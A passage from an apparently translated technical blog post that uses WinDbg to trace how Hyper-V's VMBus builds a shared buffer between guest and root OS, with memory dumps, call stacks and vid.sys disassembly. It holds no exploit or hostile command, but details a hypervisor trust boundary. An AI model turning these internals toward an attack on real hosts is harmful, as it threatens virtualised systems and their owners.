<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">sechost!ScSvcctrlThreadA+0x25</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">KERNEL32!BaseThreadInitThunk+0xd</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ntdll!RtlUserThreadStart+0x1d</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">IoAllocateMdl is called with the size of the buffer to allocate 0xC000. The result is a structure formed by MDL:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dt nt!_MDL @rax (в rax - ffffe001`51d0d0d0)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 Next : (null) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x008 Size : 0n144</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x00a MdlFlags : 0n8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x00c AllocationProcessorNumber : 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x00e Reserved : 0xffff</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x010 Process : (null) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x018 MappedSystemVa : 0xffffe001`514e684c Void</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x020 StartVa : 0xffffd000`bb193000 Void</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x028 ByteCount : 0xc000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x02c ByteOffset : 0</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It then calls the MmProbeAndLockPages, then mdl structure is complemented by elements of the pfn.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dq ffffe001`51d0d0d0 L20</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`51d0d0d0 00000000`00000000 ffff0000`008a0090</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`51d0d0e0 00000000`00000000 ffffe001`514e684c</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`51d0d0f0 ffffd000`bb193000 00000000`0000c000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`51d0d100 </span><span style="background-color: transparent; color: #002060; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`0002d5bb 00000000`0002d5bc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`51d0d110 </span><span style="background-color: transparent; color: #002060; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`0002d5bd 00000000`0002d5be</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`51d0d120 </span><span style="background-color: transparent; color: #002060; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`0002d5bf 00000000`0002d5c0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`51d0d130 </span><span style="background-color: transparent; color: #002060; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`0002d5c1 00000000`0002d5c2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`51d0d140 </span><span style="background-color: transparent; color: #002060; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`0002d5c3 00000000`0002d5c4</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`51d0d150 </span><span style="background-color: transparent; color: #002060; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`0002d5c5 00000000`0002d5c6</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">it then calls the vmbus!ChCreateGpadlFromNtmdl (2nd parameter is passed to the address of the MDL), which causes the vmbus! ChpCreateGpaRanges passing it MDL as the first parameter. It will then copy the elements of the PFN from the MDL in a separate buffer</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="119" src="https://lh5.googleusercontent.com/HaFBKdYp8eLPsn4DqkM8nCqKGlQuNM5hEuMQv5dxhYEYmLj10uwsPcQzFCKg6wL7_29B7-jmq-aOk2cXzwEknRI5wGnyfclARq4xMOiIBtGtVykP5DFhcYewgAM6S9QL-WAQE41LzOo4obPz" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="437" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">which will become the body of the message CHANNELMSG_GPADL_HEADER, which is sent from guest OS to root OS by calling the vmbus!ChSendMessage. In the hv!HvPostMessage (hvix64.exe) or at winhv!WinHvPostMessage you can see the message:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dd @rcx L30 (rcx is input parameter for hv!HvPostMessage)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000081`39c96000 00000001 00030030 00000001 000000f0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000081`39c96010 00000008 00000000 00000008 0000000f</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000081`39c96020 00010068 0000c000 00000000 0002d5bb</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000081`39c96030 00000000 0002d5bc 00000000 0002d5bd</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000081`39c96040 00000000 0002d5be 00000000 0002d5bf</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000081`39c96050 00000000 0002d5c0 00000000 0002d5c1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000081`39c96060 00000000 0002d5c2 00000000 0002d5c3</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000081`39c96070 00000000 0002d5c4 00000000 0002d5c5</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000081`39c96080 00000000 0002d5c6 00000000 00000000</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The first 16 bytes - this is a common header message where 0xF0 - the size of the message body. VMBus-packet placed inside, header of that VMBus packet indicates the type of package - 8 (CHANNELMSG_GPADL_HEADER), rangecount is 1 which means that in one package together all the data have been transmitted. Next the root OS sends message CHANNELMSG_OPENCHANNEL_RESULT, then the guest OS sends CHANNELMSG_OPENCHANNEL. After that, the root OS fulfills the Work Items</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>kc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!ChMapGpadlView</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbkmclr!KmclpServerOpenChannel</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbkmclr!KmclpWaitForActionWorkerRoutine</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!IopProcessWorkItem</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!ExpWorkerThread</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!PspSystemThreadStartup</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!KiStartSystemThread</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">in the execution of which is called vmbusr!ChMapGpadlView, from which there comes a call of vmbusr!PkParseGpaRanges, which has a parameter - pointer of part of the message, which contains the size of the buffer 0xC000 and pfn, passing in CHANNELMSG_GPADL_HEADER message. Next call vmbusr!XPartLockChildPagesSynchronous-> vmbusr! XPartLockChildPages and then the function of the driver vid.sys (the name of the function is unknown, because there are no symbols for this driver), where as 2-th parameter is the block of pfn passed as message from the guest OS </span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>u @rip – the beginning of an unnamed function from vid.sys</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Vid+0x18000:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`7d218000 xor r11d,r11d</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`7d218003 mov r10,rcx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`7d218006 cmp r9d,1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`7d21800a je Vid+0x1804a (fffff800`7d21804a)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`7d21800c lea eax,[r11+1]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`7d218010 mov rcx,qword ptr [rsp+28h]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`7d218015 mov dword ptr [rcx+2Ch],eax</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`7d218018 mov rax,qword ptr [rsp+38h]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dd poi(@rdx)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`ae827210 0000c000 00000000 0002d5bb 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`ae827220 0002d5bc 00000000 0002d5bd 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`ae827230 0002d5be 00000000 0002d5bf 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`ae827240 0002d5c0 00000000 0002d5c1 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`ae827250 0002d5c2 00000000 0002d5c3 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`ae827260 0002d5c4 00000000 0002d5c5 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`ae827270 0002d5c6 00000000 00065d63 00000000</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">immediately after the return from the function in [rsp+30h] is a pointer to the new MDL:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="155" src="https://lh4.googleusercontent.com/qg-zQNQUo0CLZh74KY2nCGSe2I4oN_REk6DJSIGD8nZUUPshSi5GKP837U5aKlwwuyLkxez8gcoGYfB7ssg-vkArH8Fr_CeeCW3uXOH6GMMr5fg_gHrgSM5bSBOkrzwTARBQfFMQ5Hu5gBhe" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="279" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next mdl contains the pfn of root OS.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="171" src="https://lh5.googleusercontent.com/yG8Iyl9GZy3qaHYm9fxnGAg2BxIc8P0GBGKDvFi7o6PVzKiIoMiukPsXNeQ7lQDBYu7KeO2-M3hB3E3ClLH-81j8JwmuT4uIfPU2jLJmSo57sJnQkR6PmbKuVqWx22mGGgcnG3Mroklu-LJ6" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="302" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dd </span><span style="background-color: transparent; color: #2f5496; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0xffffe001`ae827180</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`ae827180 00000000 00000000 00020090 ffffe001</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`ae827190 ab49f900 ffffe001 00000000 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`ae8271a0 00000000 00000000 0000c000 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`ae8271b0 </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">001367bb</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000000 001367bc 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`ae8271c0 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">001367bd</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000000 001367be 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`ae8271d0 001367bf 00000000 001367c0 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`ae8271e0 001367c1 00000000 001367c2 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`ae8271f0 001367c3 00000000 001367c4 00000000</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">after this the root OS sends CHANNELMSG_OPENCHANNEL_RESULT message. On that the process activation components Data Exchange is finished. Result is a creation of shared-buffer, visible for the guest and root OS. You can verify this by running a record arbitrary bytes in the buffer inside the guest OS, for example by using the command:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
